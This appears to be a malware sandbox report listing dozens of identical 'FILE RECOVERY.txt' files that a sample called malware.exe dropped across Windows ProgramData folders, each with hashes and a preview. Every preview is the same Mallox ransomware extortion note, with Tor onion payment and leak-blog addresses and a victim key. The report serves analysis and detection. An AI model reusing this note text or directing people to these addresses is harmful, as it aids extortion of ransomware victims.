                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-GB\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\DeviceSync\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\CustomTraceProfiles\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\ETLLogs\Autologger\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\ETLLogs\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ScenarioShutdownLogger\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\EventTranscript\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\FeedbackHub\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\LocalTraceStore\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\Sideload\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\Siufloc\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Diagnosis\SoftLandingStage\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
